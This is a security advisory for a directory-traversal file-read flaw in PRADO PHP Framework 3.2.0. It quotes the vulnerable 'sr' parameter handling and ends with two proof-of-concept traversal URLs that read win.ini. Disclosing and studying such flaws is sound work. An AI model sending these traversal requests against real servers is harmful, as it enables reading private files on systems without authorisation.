PRADO PHP Framework 3.2.0 Arbitrary File Read Vulnerability





Vendor: Prado Software

Product web page: http://www.pradosoft.com

Affected version: 3.2.0 (r3169)



Summary: PRADO is a component-based and event-driven programming

framework for developing Web applications in PHP 5. PRADO stands

for PHP Rapid Application Development Object-oriented.



Desc: Input passed to the 'sr' parameter in 'functional_tests.php'

is not properly sanitised before being used to get the contents of

a resource. This can be exploited to read arbitrary data from local

resources with directory traversal attack.





---------------------------------------------------------------------------------------

/tests/test_tools/functional_tests.php:

---------------------------------------



 3: $TEST_TOOLS = dirname(__FILE__);

 4:

 5: if(isset($_GET['sr']))

 6: {

 7:

 8:     if(($selenium_resource=realpath($TEST_TOOLS.'/selenium/'.$_GET['sr']))!==false)

 9:         echo file_get_contents($selenium_resource);

10: exit;

11: }



---------------------------------------------------------------------------------------





Tested on: Microsoft Windows 7 Ultimate SP1 (EN)

           Apache 2.4.2 (Win32)

           PHP 5.4.4

           MySQL 5.5.25a





Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

                            @zeroscience





Advisory ID: ZSL-2012-5113

Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5113.php







25.11.2012



--



http://172.162.133.7/tests/test_tools/functional_tests.php?sr=../../../../../../windows/win.ini

http://172.162.133.7/demos/time-tracker/tests/functional.php?sr=../../../../../../windows/win.ini